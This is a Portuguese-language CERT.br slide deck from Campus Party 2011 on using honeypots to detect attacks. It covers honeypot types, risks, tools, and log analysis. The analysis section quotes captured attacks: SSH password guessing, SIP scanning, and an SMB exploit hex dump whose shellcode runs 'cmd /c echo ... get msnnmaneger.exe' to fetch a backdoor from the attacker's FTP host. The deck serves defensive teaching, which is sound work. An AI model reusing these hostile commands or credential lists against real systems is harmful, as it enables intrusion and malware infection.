SlideShare uma empresa Scribd logo
1 de 41
Baixar para ler offline
ı `
                          Uso de Honeypots no aux´lio a
                                   ¸˜
                              deteccao de ataques

                                                    Klaus Steding-Jessen
                                                             jessen@cert.br

                                                             ¸˜
                                               Esta apresentacao:
                                      http://www.cert.br/docs/palestras/




              Centro de Estudos, Resposta e Tratamento de Incidentes de Seguranca no Brasil
                                                                               ¸
                                              ¸˜             ¸˜
                            Nucleo de Informacao e Coordenacao do Ponto br
                              ´
                                         ˆ
                                   Comite Gestor da Internet no Brasil




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 1/41
Sobre o CERT.br
          Criado em 1997 como ponto focal nacional para tratar
          incidentes de seguranca relacionados com as redes
                                ¸
                      `
          conectadas a Internet no Brasil

                                                                  CERT.br


                            Tratamento de                          Treinamento e      Análise de
                              Incidentes                          Conscientização     Tendências

                           − Articulação                          − Cursos          − Consórcio
                           − Apoio à                              − Palestras         de Honeypots
                             recuperação                          − Documentação    − SpamPots
                           − Estatísticas                         − Reuniões        − Honeynet.BR




          http://www.cert.br/missao.html
                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 2/41
Estrutura do CGI.br




                     ´         ˆ
           01- Ministerio da Ciencia e Tecnologia                              11- Provedores de Acesso e Conteudo ´
                     ´                  ¸˜
           02- Ministerio das Comunicacoes                                     12- Provedores de Infra-estrutura de
                                   ˆ
           03- Casa Civil da Presidencia da Republica
                                                ´                                                ¸˜
                                                                                   Telecomunicacoes
                     ´
           04- Ministerio da Defesa                                                                            ´
                                                                               13- Industria de Bens de Informatica,
                                                                                       ´
                     ´                                          ´
           05- Ministerio do Desenvolvimento, Industria e Comercio Exterior
                                                  ´                                              ¸˜
                                                                                   Telecomunicacoes e Software
                     ´
           06- Ministerio do Planejamento, Orcamento e Gestao
                                              ¸               ˜                14- Segmento das Empresas Usuarias´
                  ˆ                               ¸˜
           07- Agencia Nacional de Telecomunicacoes (Anatel)                       de Internet
                                                                         ´
           08- Conselho Nacional de Desenvolvimento Cient´fico e Tecnologico 15-18- Representantes do Terceiro Setor
                                                            ı
                ´                        ´
           09- Forum Nacional de Secretarios Estaduais para Assuntos de C&T 19-21- Representantes da Comunidade
                                     ´
           10- Representante de Notorio Saber em Assuntos de Internet                                ´
                                                                                   Cient´fica e Tecnologica
                                                                                         ı


                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 3/41
¸˜
                    Atribuicoes do CGI.br

                                   ¸˜
          Entre as diversas atribuicoes e responsabilidades
          definidas no Decreto Presidencial no 4.829, destacam-se:
               • a proposicao de normas e procedimentos relativos a
                          ¸˜                                      `
                                  ¸˜
                    regulamentacao das atividades na internet
               •                   ¸˜        ˜                      ´
                    a recomendacao de padroes e procedimentos tecnicos
                    operacionais para a internet no Brasil
               •                                           ´
                    o estabelecimento de diretrizes estrategicas relacionadas ao
                    uso e desenvolvimento da internet no Brasil
               •              ¸˜                     ˜      ´
                    a promocao de estudos e padroes tecnicos para a
                    seguranca das redes e servicos no pa´s
                              ¸                    ¸            ı
               •                 ¸˜          ¸˜
                    a coordenacao da atribuicao de enderecos internet (IPs) e do
                                                              ¸
                    registro de nomes de dom´nios usando <.br>
                                               ı
               •                        ˜ e disseminacao de informacoes sobre
                    a coleta, organizacao
                                      ¸                  ¸˜              ¸˜
                    os servicos internet, incluindo indicadores e estat´sticas
                              ¸                                           ı


                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 4/41
Agenda

                  ¸˜
          Introducao
              Conceitos
                  ´
              Historico
              Vantagens e Desvantagens
          Tipos de Honeypots
          Riscos
          Quando Usar Cada Tipo
          Baixa x Alta Interatividade
                    ¸˜
          Implementacao
            ´
          Analise de Logs
               ˆ
          Referencias

                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 5/41
“A Honeypot is a security resource whose value
          lies in being probed, attacked or compromised.”
          — Lance Spitzner, Honeypots: Tracking Hackers




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 6/41
¸˜
                    Poss´veis Aplicacoes
                        ı



               •           ¸˜
                    Deteccao de probes e ataques
                    automatizados
               •    Captura de ferramentas, novos worms/bots,
                    etc
               •              ¸˜
                    Comparacao com logs de firewall/IDS
               •              ¸˜      ´
                    Identificacao de maquinas
                    infectadas/comprometidas
               •    Melhorar a postura de seguranca
                                                 ¸


                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 7/41
´
                    Historico (1/2)



          1988–1989: “Stalking the Wily Hacker ” e “The Cuckoo’s
          Egg”, Clifford Stoll
                     ˜
          Sistema nao havia sido preparado para ser invadido.
                  ˆ
          Discrepancia de US$ 0,75 na contabilidade do sistema
                     `         ¸˜
          deu in´cio a monitoracao do invasor.
                ı
          1992: “An Evening with Berferd”, Bill Cheswick e “There
          Be Dragons”, Steven M. Bellovin
          Sistema preparado para ser invadido, visando o
          aprendizado. Foram utilizados emuladores de servicos e
                                                             ¸
          ambientes chroot’d.



                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 8/41
´
                    Historico (2/2)

          1997–1998: Primeiras ferramentas
          Deception Toolkit (DTK), Cybercop Sting, NetFacade, and
          NFR BackOfficer Friendly
          1999: In´cio do projeto Honeynet, com 30 membros
                   ı
          2001: In´cio da Honeynet Research Alliance
                   ı
          2002: Honeyd
                     ´
          2006: Apos 1 ano de desenvolvimento em paralelo
          Mwcollect e Nepenthes se unem
          Nepenthes passa a ser o software e Mwcollect uma
          comunidade sobre esforcos de coleta de malware
                                   ¸
          2008: client-side honeypots
          2009: Dionaea (em andamento)

                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 9/41
Vantagens da Tecnologia


               •     ˜    ´ ´                      ´
                    Nao ha trafego “normal” – tudo e suspeito e
                    potencialmente malicioso
               •    Menor volume de dados para analisar do
                    que sensores IDS
               •    Pode prover dados valiosos sobre atacantes
                                   ´
                         – novos metodos
                         – ferramentas usadas, etc

               •    Pode coletar novos tipos de malware
               •    Pode ser usado para capturar spam

                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 10/41
Desvantagens da Tecnologia




               •    Dependendo do tipo de honeypot, pode
                                    `         ¸˜
                    oferecer riscos a instituicao
               •    Pode demandar muito tempo
               •      ˆ
                    Ve apenas os ataques direcionados ao
                    honeypot




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 11/41
Tipos de Honeypots




               •    Baixa Interatividade
               •    Alta Interatividade




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 12/41
Honeypots de Baixa Interatividade

               •    Emulam servicos e sistemas
                                  ¸
               •                 ˜
                    O atacante nao tem acesso ao sistema
                    operacional real
               •                 ˜
                    O atacante nao compromete o honeypot
                    (idealmente)
               •      ´
                    Facil de configurar e manter
               •    Baixo risco
               •            ¸˜             ˜
                    Informacoes obtidas sao limitadas
               •    Exemplos: “listeners”, emuladores de
                    servicos, Honeyd, Nepenthes
                         ¸
                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 13/41
Honeypots de Alta Interatividade



               •    Mais dif´ceis de instalar e manter
                            ı
               •    Maior risco
               •                                       ¸˜
                    Necessitam mecanismos de contencao –
                    para evitar que sejam usados para
                    lancamento de ataques contra outras redes
                       ¸
               •                                ¸˜
                    Coleta extensa de informacoes
               •    Exemplos: honeynets e honeynets virtuais



                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 14/41
Honeynets


          “A Honeynet is nothing more than one type of
          honeypot. Specifically, it is a high interaction
          honeypot designed primarily for research, to
          gather information on the enemy. [. . . ] A
          Honeynet is different from traditional honeypots,
          it is what we would categorize as a research
          honeypot.”
          – Lance Spitzner, Know Your Enemy:
          Honeynets


                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 15/41
Caracter´sticas das Honeynets
                            ı




               •                ´                        ¸˜
                    Redes com multiplos sistemas e aplicacoes
               •                                ¸˜       ´
                    Mecanismo robusto de contencao de trafego
                         – pode possuir multiplas camadas de controle
                                         ´
                         – frequentemente chamado de honeywall
                               ¨

               •    Mecanismos de alerta e de captura de
                    dados




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 16/41
Requisitos das Honeynets

               •     ˜             ¸˜
                    Nao haver poluicao de dados
                                           ´
                         – sem testes ou trafego gerado pelos administradores
               •    Controle
                         – deve impedir os ataques partindo da honeynet contra
                           outros sistemas
                         – precisa ser transparente para o atacante
                                  ˜
                         – pode nao enganar todos os atacantes
                         – deve permitir que o atacante “trabalhe”, baixe
                           ferramentas, conecte no IRC, etc.
                         – deve possuir multiplas camadas de contencao
                                           ´                          ¸˜
               •    Captura de dados
               •    Coleta de dados
               •    Mecanismos de alerta
                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 17/41
Riscos




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 18/41
Riscos – Baixa Interatividade




               •    Comprometimento do Sistema Operacional
                    “real” do honeypot
               •    O software do honeypot pode ter
                    vulnerabilidades
               •    Atrair atacantes para a sua rede




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 19/41
Riscos – Alta Interatividade (1/2)




               •    Um erro nos mecanismos de controle ou na
                             ¸˜
                    configuracao pode:
                         – permitir que o honeypot seja usado para prejudicar
                           outras redes
                                                                      ¸˜
                         – abrir uma porta para a rede da sua organizacao

               •    Um comprometimento associado com sua
                            ¸˜
                    organizacao pode afetar a sua imagem



                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 20/41
Riscos – Alta Interatividade (2/2)



                    ˜
          Porque sao mais arriscados:
                            ¸˜
           • N´vel de interacao – o atacante tem controle
               ı
                             ´
             total sobre a maquina
           • Complexos de instalar e manter
                         – diversas tecnologias interagindo
                         – multiplos pontos de falha
                             ´

               •    Novos ataques e ameacas inesperadas
                                         ¸
                            ˜
                    podem nao ser contidos ou vistos


                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 21/41
Quando Usar Cada Tipo




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 22/41
Uso – Baixa Interatividade



               •      ˜    ´
                    Nao ha hardware suficiente para montar
                    uma honeynet
               •                                       ˜ ´
                    O risco de outro tipo de honeypot nao e
                         ´
                    aceitavel
               •             ´  ´
                    O proposito e:
                         –     identificar scans e ataques automatizados
                         –     enganar script kiddies
                         –     atrair atacantes para longe de sistemas importantes
                         –     coletar assinaturas de ataques



                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 23/41
Uso – Alta Interatividade




               •          ´     ´
                    O proposito e observar:
                         – o comportamento e as atividades de atacantes
                                                       ˜
                         – um comprometimento real (nao emulado)
                         – conversas de IRC

               •    Coletar material para pesquisa e
                                       ´
                    treinamento em analise de artefatos e
                       ´
                    analise forense



                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 24/41
Baixa x Alta Interatividade
             Caracter´sticas
                     ı                                             Baixa Interatividade   Alta Interatividade

                    ¸˜
             Instalacao                                                    ´
                                                                          facil              mais dif´cil
                                                                                                     ı
                    ¸˜
             Manutencao                                                    ´
                                                                          facil              trabalhosa
                  ¸˜            ¸˜
             Obtencao de informacoes                                    limitada              extensiva
             Necessidade de mecanis-                                        ˜
                                                                           nao                   sim
                          ¸˜
             mos de contencao
             Atacante tem acesso ao                                   ˜
                                                                     nao (em teoria)             sim
             S.O. real
                   ¸˜
             Aplicacoes e servicos ofe-
                               ¸                                        emulados                reais
             recidos
             Atacante pode comprome-                                  ˜
                                                                     nao (em teoria)             sim
             ter o honeypot
                              ¸˜
             Risco da organizacao so-                                     baixo                  alto
             frer um comprometimento

                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 25/41
¸˜
                                              Implementacao




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 26/41
Honeyd



          “Honeyd is a small daemon that creates virtual hosts on a
          network. The hosts can be configured to run arbitrary
          services, and their personality can be adapted so that
          they appear to be running certain operating systems.
          Honeyd enables a single host to claim multiple addresses
          - I have tested up to 65536 - on a LAN for network
          simulation.”
               • http://www.honeyd.org/




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 27/41
Honeyd: honeyd.conf

   ### default
   create default
   set default personality "Microsoft Windows XP Professional"
   set default default tcp action reset
   set default default udp action reset
   set default default icmp action open

   ###      Linux

   create linux
   set linux personality "Linux Kernel 2.4.3 SMP (RedHat)"
   set linux default tcp action reset
   set linux default udp action reset
   set linux default icmp action open

   add linux tcp port 111 open

   bind 192.168.0.1 linux
   bind 192.168.0.2 linux



                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 28/41
Nepenthes




          “Nepenthes is a versatile tool to collect malware. It acts
          passively by emulating known vulnerabilities and
          downloading malware trying to exploit these
          vulnerabilities.”
               • http://nepenthes.carnivore.it/




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 29/41
Dionaea




          “Dionaea is meant to be a nepenthes successor,
          embedding python as scripting language, using libemu to
          detect shellcodes, supporting ipv6 and tls”
               • http://dionaea.carnivore.it/




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 30/41
´
                                             Analise de Logs




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 31/41
Logs Honeyd: exemplos (cont)




   2011-01-16-20:56:41.3072                      tcp(6)       -    85.185.173.28   4975   192.168.0.57   4899:   48   S
   2011-01-16-20:56:41.3291                      tcp(6)       -    85.185.173.28   4510   192.168.0.55   4899:   48   S
   2011-01-16-20:56:41.3337                      tcp(6)       -    85.185.173.28   4359   192.168.0.48   4899:   48   S
   2011-01-16-20:56:41.4412                      tcp(6)       -    85.185.173.28   4890   192.168.0.56   4899:   48   S
   2011-01-16-20:56:41.4421                      tcp(6)       -    85.185.173.28   1036   192.168.0.59   4899:   48   S
   2011-01-16-20:56:41.4453                      tcp(6)       -    85.185.173.28   4473   192.168.0.54   4899:   48   S
   2011-01-16-20:56:41.4479                      tcp(6)       -    85.185.173.28   1046   192.168.0.62   4899:   48   S
   2011-01-16-20:56:41.4488                      tcp(6)       -    85.185.173.28   4364   192.168.0.51   4899:   48   S
   2011-01-16-20:56:41.4669                      tcp(6)       -    85.185.173.28   1031   192.168.0.58   4899:   48   S
   2011-01-16-20:56:41.4688                      tcp(6)       -    85.185.173.28   4365   192.168.0.52   4899:   48   S
   2011-01-16-20:56:41.4733                      tcp(6)       -    85.185.173.28   1042   192.168.0.61   4899:   48   S
   2011-01-16-20:56:41.4762                      tcp(6)       -    85.185.173.28   1039   192.168.0.60   4899:   48   S




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 32/41
Logs Honeyd: exemplos (cont)

   T 2011/01/16 18:33:54.407677 218.12.198.70:53274 -> 192.168.0.61:22 [AP]
     SSH-2.0-libssh-0.11..

   T 2011/01/16 20:36:43.600119 62.38.27.161:49681 -> 192.168.0.61:22 [AP]
     SSH-2.0-libssh-0.1..

   T 2011/01/16 20:36:43.623727 62.38.27.161:55708 -> 192.168.0.56:22 [AP]
     SSH-2.0-libssh-0.1..

   T 2011/01/16 20:36:43.640609 62.38.27.161:58963 -> 192.168.0.54:22 [AP]
     SSH-2.0-libssh-0.1..

   T 2011/01/16 20:36:43.651256 62.38.27.161:60378 -> 192.168.0.58:22 [AP]
     SSH-2.0-libssh-0.1..

   T 2011/01/16 20:36:43.652722 62.38.27.161:60375 -> 192.168.0.62:22 [AP]
     SSH-2.0-libssh-0.1..

   T 2011/01/16 20:36:43.653342 62.38.27.161:53103 -> 192.168.0.59:22 [AP]
     SSH-2.0-libssh-0.1..


                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 33/41
Logs Honeyd: exemplos (cont)

   Jan    17    13:37:57        hpot     sshd:       ’luisa’ (password ’luisa123’) from 201.62.100.155
   Jan    17    13:38:00        hpot     sshd:       ’luisa’ (password ’123456’) from 201.62.100.155
   Jan    17    13:38:02        hpot     sshd:       ’luisa’ (password ’123’) from 201.62.100.155
   Jan    17    13:38:05        hpot     sshd:       ’armando’ (password ’armando’) from 201.62.100.155
   Jan    17    13:38:07        hpot     sshd:       ’armando’ (password ’armando123’) from 201.62.100.155
   Jan    17    13:38:09        hpot     sshd:       ’armando’ (password ’123456’) from 201.62.100.155
   Jan    17    13:38:12        hpot     sshd:       ’armando’ (password ’123’) from 201.62.100.155
   Jan    17    13:38:14        hpot     sshd:       ’matheos’ (password ’matheos’) from 201.62.100.155
   Jan    17    13:38:16        hpot     sshd:       ’matheos’ (password ’matheos123’) from 201.62.100.155
   Jan    17    13:38:19        hpot     sshd:       ’matheos’ (password ’123456’) from 201.62.100.155
   Jan    17    13:38:21        hpot     sshd:       ’matheos’ (password ’123’) from 201.62.100.155
   Jan    17    13:38:23        hpot     sshd:       ’mateo’ (password ’mateo’) from 201.62.100.155
   Jan    17    13:38:26        hpot     sshd:       ’mateo’ (password ’mateo123’) from 201.62.100.155
   Jan    17    13:38:28        hpot     sshd:       ’mateo’ (password ’123456’) from 201.62.100.155
   Jan    17    13:38:30        hpot     sshd:       ’mateo’ (password ’123’) from 201.62.100.155
   Jan    17    13:38:32        hpot     sshd:       ’angela’ (password ’angela’) from 201.62.100.155
   Jan    17    13:38:35        hpot     sshd:       ’angela’ (password ’angela123’) from 201.62.100.155
   Jan    17    13:38:37        hpot     sshd:       ’angela’ (password ’123456’) from 201.62.100.155
   Jan    17    13:38:39        hpot     sshd:       ’angela’ (password ’123’) from 201.62.100.155



                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 34/41
Logs Honeyd: exemplos (cont)


   T 2011/01/16 12:05:54.255121 113.53.231.82:50210 -> 192.168.0.62:80 [AP]
   GET //cgi/stats/awstats.pl HTTP/1.1..
   Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate..
   User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)..
   Host: 192.168.0.62..Connection: Close....

   T 2011/01/16 12:05:54.257410 113.53.231.82:44469 -> 192.168.0.55:80 [AP]
   GET //cgi/stats/awstats.pl HTTP/1.1..
   Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate..
   User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)..
   Host: 192.168.0.55..Connection: Close....

   T 2011/01/16 12:05:54.265120 113.53.231.82:52495 -> 192.168.0.54:80 [AP]
   GET //cgi/stats/awstats.pl HTTP/1.1..
   Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate..
   User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)..
   Host: 192.168.0.54..Connection: Close....




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 35/41
Logs Nepenthes: exemplos

   [11022008 03:50:46 debug net mgr] Accepted Connection Socket TCP (accept)
   200.104.169.24:3775 -> hpot:445
   [11022008 03:50:56 info down mgr] Handler ftp download handler will download
   ftp://200.104.169.24:21910/msnnmaneger.exe
   [11022008 03:50:56 info down handler] url has
   ftp://200.104.169.24:21910/msnnmaneger.exe ip, we will download it now

   [2008-02-11T03:51:25] 200.104.169.24 -> hpot 
   ftp://200.104.169.24:21910/msnnmaneger.exe 62a00070154ecd8e3b5bda83432ba4c3

    AVG                               -              -             BackDoor.RBot.AX
    BitDefender                       -              -             DeepScan:Generic.Malware.KIFWXg.44C81B79
    CAT-QuickHeal                     -              -             Backdoor.SdBot.gen
    ClamAV                            -              -             PUA.Packed.Themida
    F-Secure                          -              -             Backdoor:W32/Rbot.GJJ
    Ikarus                            -              -             Generic.Sdbot
    NOD32v2                           -              -             a variant of Win32/Packed.Themida
    Prevx1                            -              -             BACKDOOR.DIMPY.WIN32VBSY.Q
    Sophos                            -              -             Sus/ComPack
    Sunbelt                           -              -             VIPRE.Suspicious
    TheHacker                         -              -             W32/Behav-Heuristic-064
    VirusBuster                       -              -             Worm.Rbot.VDL

                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 36/41
Logs Nepenthes: exemplos

   Feb 11 03:50:56.360974                    200.104.169.24.3788                 > hpot.445
     0020: 5010 faf0 fcce                    0000 ff53 4d42 7300                 0000 .........SMBs...
     0030: 0018 07c8 0000                    0000 0000 0000 0000                 0000 ................
     0040: 0000 3713 0000                    0000 0cff 0000 0004                 110a ................
     0050: 0000 0000 0000                    007e 1000 0000 00d4                 0000 .......~........
     0060: 807e 1060 8210                    7a06 062b 0601 0505                 02a0 .~....z..+.....
     0070: 8210 6e30 8210                    6aa1 8210 6623 8210                 6203 ..n0..j¡..f#..b.
     0080: 8204 0100 4141                    4141 4141 4141 4141                 4141 ....AAAAAAAAAAAA
     0090: 4141 4141 4141                    4141 4141 4141 4141                 4141 AAAAAAAAAAAAAAAA
     [...]
     0500: 0000 8b40 3405                    7c00     0000         8b68   3c5f   31f6   ...@4.|....h<_1.
     0510: 6056 eb0d 68ef                    cee0     6068         98fe   8a0e   57ff   ....h....h....W.
     0520: e7e8 eeff ffff                    636d     6420         2f63   2065   6368   ......cmd /c ech
     0530: 6f20 6f70 656e                    2030     2e30         2e30   2e30   2032   o open 0.0.0.0 2
     0540: 3139 3130 203e                    3e20     6969         2026   6563   686f   1910 >> ii &echo
     0550: 2075 7365 7220                    6120     6120         3e3e   2069   6920    user a a >> ii
     0560: 2665 6368 6f20                    6269     6e61         7279   203e   3e20   &echo binary >>
     0570: 6969 2026 6563                    686f     2067         6574   206d   736e   ii &echo get msn
     0580: 6e6d 616e 6567                    6572     2e65         7865   203e   3e20   nmaneger.exe >>
     0590: 6969 2026 6563                    686f     2062         7965                 ii &echo bye


                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 37/41
Logs SIP (OPTIONS)


   U 2010/09/28 22:54:07.491696 89.47.63.183:59317 -> network_server:5060
     OPTIONS sip:100@network_server SIP/2.0..Via: SIP/2.0/UDP 127.0.1.1:5060;bra
     nch=z9hG4bK-3932320937;rport..Content-Length: 0..From: "sipvicious"<sip:100
     @1.1.1.1>; tag=6338616232316238313363340132333530383633323634..Accept: appl
     ication/sdp..User-Agent: friendly-scanner..To: "sipvicious"<sip:100@1.1.1.1
     >..Contact: sip:100@127.0.1.1:5060..CSeq: 1 OPTIONS..Call-ID: 3655079754140
     81403837664..Max-Forwards: 70....

   U 2010/09/28 22:54:07.580669 network_server:5060 -> 89.47.63.183:59317
     SIP/2.0 200 OK..Call-id: 365507975414081403837664..Cseq: 1 OPTIONS..From: "
     sipvicious"<sip:100@1.1.1.1>; tag=63386162323162383133633401323335303836333
     23634..To: "sipvicious"<sip:100@1.1.1.1>..Via: SIP/2.0/UDP 127.0.1.1:5060;b
     ranch=z9hG4bK-3932320937;received=89.47.63.183;rport=59317..Server: Asteris
     k PBX 1.2.22..Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, N
     OTIFY, INFO..Supported: replaces, timer..Contact: <sip:network_server>..Acc
     ept: application/sdp..Content-length: 0....




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 38/41
Los SIP (REGISTER)

   2010-10-20 05:57:55 IP: 211.103.141.180, method: REGISTER,
   from: "123", to: "123", CSeq: "1 REGISTER", user-agent: "friendly-scanner"

   [...]      from:      "1234", to: "1234", [...]
   [...]      from:      "12345", to: "12345", [...]
   [...]      from:      "123456", to: "123456", [...]
   [...]      from:      "sip", to: "sip", [...]
   [...]      from:      "admin", to: "admin", [...]
   [...]      from:      "pass", to: "pass", [...]
   [...]      from:      "password", to: "password", [...]
   [...]      from:      "testing", to: "testing", [...]
   [...]      from:      "guest", to: "guest", [...]
   [...]      from:      "voip", to: "voip", [...]
   [...]      from:      "account", to: "account", [...]
   [...]      from:      "passwd", to: "passwd", [...]
   [...]      from:      "qwerty", to: "qwerty", [...]
   [...]      from:      "654321", to: "654321", [...]
   [...]      from:      "54321", to: "54321", [...]
   [...]      from:      "4321", to: "4321", [...]
   [...]      from:      "abc123", to: "abc123", [...]
   [...]      from:      "123abc", to: "123abc", [...]

                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 39/41
Logs SIP (INVITE)



   U 2010/09/30 23:50:21.236653 67.21.82.4:45018 -> network_server:5060
     INVITE sip:96626653000@network_server SIP/2.0..Via: SIP/2.0/UDP 67.21.82.4:
     45018;rport;branch=z9hG4bK051C0283E05B4BF182275668E1F3BD15..From: 102 <sip:
     102@network_server>;tag=129156506..To: <sip:96626653000@network_server>..Co
     ntact: <sip:102@67.21.82.4:45018>..Call-ID: 3A1309F9-9FAC-4BE3-8B7E-9294496
     D1E08@192.168.1.3..CSeq: 9999 INVITE..Max-Forwards: 70..Content-Type: appli
     cation/sdp..User-Agent: X-PRO build 1101..Content-Length: 312....v=0..o=102
      4272671 4272671 IN IP4 67.21.82.4..s=X-PRO..c=IN IP4 67.21.82.4..t=0 0..m=
     audio 45020 RTP/AVP 0 8 3 18 98 97 101..a=rtpmap:0 pcmu/8000..a=rtpmap:8 pc
     ma/8000..a=rtpmap:3 gsm/8000..a=rtpmap:18 G729/8000..a=rtpmap:98 iLBC/8000.
     .a=rtpmap:97 speex/8000..a=rtpmap:101 telephone-event/8000..a=fmtp:101 0-15
     ..




                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 40/41
ˆ
                    Referencias


               • Honeypots e Honeynets: Definicoes e Aplicacoes
                                             ¸˜           ¸˜
                    http://www.cert.br/docs/whitepapers/honeypots-honeynets/
               • Consorcio Brasileiro de Honeypots
                     ´
                    http://www.honeypots-alliance.org.br/
               • The Honeynet Project
                    http://www.honeynet.org/
               • CERT.br
                    http://www.cert.br/
               • NIC.br
                    http://www.nic.br/
               • CGI.br
                    http://www.cgi.br/


                           ˜
Campus Party Brasil 2011, Sao Paulo – janeiro de 2011 – p. 41/41

Mais conteúdo relacionado

Destaque

Palestra Infografia e Visualização de dados
Palestra Infografia e Visualização de dadosPalestra Infografia e Visualização de dados
Palestra Infografia e Visualização de dadosCampus Party Brasil
 
O que muda na Comunicação Social com a TV Digital?
O que muda na Comunicação Social com a TV Digital?O que muda na Comunicação Social com a TV Digital?
O que muda na Comunicação Social com a TV Digital?Campus Party Brasil
 
Uma visão do mundo rails campus party 2011 - fabio akita
Uma visão do mundo rails   campus party 2011 - fabio akitaUma visão do mundo rails   campus party 2011 - fabio akita
Uma visão do mundo rails campus party 2011 - fabio akitaCampus Party Brasil
 
Projeto lousa interativa_ntmvr_2010
Projeto lousa interativa_ntmvr_2010Projeto lousa interativa_ntmvr_2010
Projeto lousa interativa_ntmvr_2010Campus Party Brasil
 
Desenvolvendo para iOS com Cocoa-Touch
Desenvolvendo para iOS com Cocoa-TouchDesenvolvendo para iOS com Cocoa-Touch
Desenvolvendo para iOS com Cocoa-TouchCampus Party Brasil
 
Compus Party - processing e arduino
Compus Party - processing e arduinoCompus Party - processing e arduino
Compus Party - processing e arduinoCampus Party Brasil
 
Astrofotografia simples campus party 2011
Astrofotografia simples campus party 2011Astrofotografia simples campus party 2011
Astrofotografia simples campus party 2011Campus Party Brasil
 
Palestra vrlivrestudio sergio_gracas
Palestra vrlivrestudio sergio_gracasPalestra vrlivrestudio sergio_gracas
Palestra vrlivrestudio sergio_gracasCampus Party Brasil
 
Realidades aumentada e diminuída
Realidades aumentada e diminuídaRealidades aumentada e diminuída
Realidades aumentada e diminuídaCampus Party Brasil
 

Destaque (20)

Javascript
JavascriptJavascript
Javascript
 
Palestra Infografia e Visualização de dados
Palestra Infografia e Visualização de dadosPalestra Infografia e Visualização de dados
Palestra Infografia e Visualização de dados
 
O que muda na Comunicação Social com a TV Digital?
O que muda na Comunicação Social com a TV Digital?O que muda na Comunicação Social com a TV Digital?
O que muda na Comunicação Social com a TV Digital?
 
Untitled 1
Untitled 1Untitled 1
Untitled 1
 
ApresentaçãO Mvc
ApresentaçãO MvcApresentaçãO Mvc
ApresentaçãO Mvc
 
Music hack day
Music hack day Music hack day
Music hack day
 
Palestra A morte do Super-homem
Palestra A morte do Super-homemPalestra A morte do Super-homem
Palestra A morte do Super-homem
 
Uma visão do mundo rails campus party 2011 - fabio akita
Uma visão do mundo rails   campus party 2011 - fabio akitaUma visão do mundo rails   campus party 2011 - fabio akita
Uma visão do mundo rails campus party 2011 - fabio akita
 
Projeto lousa interativa_ntmvr_2010
Projeto lousa interativa_ntmvr_2010Projeto lousa interativa_ntmvr_2010
Projeto lousa interativa_ntmvr_2010
 
Jono mozilla-talk
Jono mozilla-talkJono mozilla-talk
Jono mozilla-talk
 
Desenvolvendo para iOS com Cocoa-Touch
Desenvolvendo para iOS com Cocoa-TouchDesenvolvendo para iOS com Cocoa-Touch
Desenvolvendo para iOS com Cocoa-Touch
 
2011 01-18.campus party 2011
2011 01-18.campus party 20112011 01-18.campus party 2011
2011 01-18.campus party 2011
 
Compus Party - processing e arduino
Compus Party - processing e arduinoCompus Party - processing e arduino
Compus Party - processing e arduino
 
Flash mobile
Flash mobileFlash mobile
Flash mobile
 
Uso do GPS para fazer música
Uso do GPS para fazer músicaUso do GPS para fazer música
Uso do GPS para fazer música
 
Astrofotografia simples campus party 2011
Astrofotografia simples campus party 2011Astrofotografia simples campus party 2011
Astrofotografia simples campus party 2011
 
2011 01-18 ecommerce
2011 01-18 ecommerce2011 01-18 ecommerce
2011 01-18 ecommerce
 
